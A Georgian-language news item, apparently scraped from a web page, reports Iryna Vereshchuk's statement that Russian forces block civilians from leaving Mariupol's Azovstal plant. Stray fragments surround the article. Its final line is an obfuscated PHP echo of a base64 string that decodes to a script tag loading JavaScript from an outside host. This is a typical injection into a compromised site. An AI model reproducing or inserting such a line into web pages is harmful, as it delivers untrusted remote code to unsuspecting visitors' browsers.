celsiusi
ავერსი შნაიდერი
უკრაინის ვიცე-პრემიერის განცხადებით, ოკუპანტები შეგნებულად არ ათავსიუფლებენ "აზოვსტალის" ქარხნის ტერიტორიაზე მყოფ სამოქალაქო პირებს, რადგან მოხდეს ქალაქის დამცველებზე ზეწოლა და მათ დანებება აიძულონ - ამის შესახებ ირინა ვერეშჩუკმა Telegram-ის საშუალებით განაცხადა.
 
უკრაინული მედიის ინფორმაციით, ამ დროისთვის მარიუპოლის ქარხნის ტერიტორიაზე ათასამდე მშვიდობიანი მოქალაქე იმყოფება.
 
"ჩვენთვის მნიშვნელოვანია, რომ საერთაშორისო მედიამ სიმართლე გაიგოს: რუსებს "აზოვსტალზე" შტურმის ეშინიათ, მაგრამ ამავე დროს ისინი მიზანმიმართულად და ცინიკურად ეწინააღმდეგებიან "აზოვსტალიდან" მშვიდობიანი მოქალაქეების გასვლას, რითაც ცდილობენ, რომ ჩვენს სამხედროებზე დამატებითი ზეწოლა განახორციელონ," - განაცხადა ირინა ვერესჩუკმა. 
 
მოსკოვმა მარიუპოლის უკანასკნელი ციხესიმაგრის განადგურების ბრძანა გასცა, თუმცა ბატალიონი "აზოვი" და 36-ე საზღვაო ბრიგადა პოზიციებს ამ დრომდე ინარჩუნებენ. ქარხანას, სადაც უკრაინელ ჯარისკაცებთან ერთად ათასამდე ბავშვი, ქალი და მოხუცია, ავიაციის გარდა ოკუპანტები ტანკებიდან და მძიმე არტილერიიდან ესვრიან.
708
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");